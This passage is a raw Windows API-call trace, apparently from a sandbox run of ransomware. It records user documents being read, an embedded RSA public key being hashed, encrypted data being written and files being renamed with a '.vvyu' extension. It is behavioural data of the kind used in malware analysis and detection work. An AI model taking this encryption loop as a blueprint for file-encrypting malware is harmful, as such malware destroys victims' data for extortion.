returned 1 [0195.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d426a0 | out: hHeap=0x6a0000) returned 1 [0195.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.394] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x941d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x941d, lpOverlapped=0x0) returned 1 [0195.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.396] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x9422, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.396] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.397] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.397] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.398] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.398] CloseHandle (hObject=0x52c) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0195.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d2cc80 [0195.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0195.399] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\Gz- YQUlpeGhm6.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\gz- yqulpeghm6.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\Gz- YQUlpeGhm6.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\gz- yqulpeghm6.odt.vvyu")) returned 1 [0195.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.402] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.405] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e9a0310, ftCreationTime.dwHighDateTime=0x1d89ca6, ftLastAccessTime.dwLowDateTime=0x2af78bc0, ftLastAccessTime.dwHighDateTime=0x1d89e78, ftLastWriteTime.dwLowDateTime=0x2af78bc0, ftLastWriteTime.dwHighDateTime=0x1d89e78, nFileSizeHigh=0x0, nFileSizeLow=0x11bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9kn7Y7ceFV.xls", cAlternateFileName="X9KN7Y~1.XLS")) returned 1 [0195.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0195.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.405] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\X9kn7Y7ceFV.xls") returned=".xls" [0195.405] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\X9kn7Y7ceFV.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\x9kn7y7cefv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.406] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=72661) returned 1 [0195.406] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.408] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x11baf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.408] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.411] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.411] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x11bd5, lpOverlapped=0x0) returned 1 [0195.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.412] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea678) returned 1 [0195.413] CryptCreateHash (in: hProv=0x6ea678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.413] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.413] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.413] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.413] GetLastError () returned 0x0 [0195.413] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.413] CryptReleaseContext (hProv=0x6ea678, dwFlags=0x0) returned 1 [0195.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.414] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.414] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.414] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11be0) returned 0x2d49778 [0195.414] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d426a0 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d426e8 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.415] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a150 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a138 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0195.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.418] GetCurrentThreadId () returned 0x264 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46b40 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.419] GetCurrentThreadId () returned 0x264 [0195.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a150 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1b0 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a180 [0195.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1c8 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a168 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: 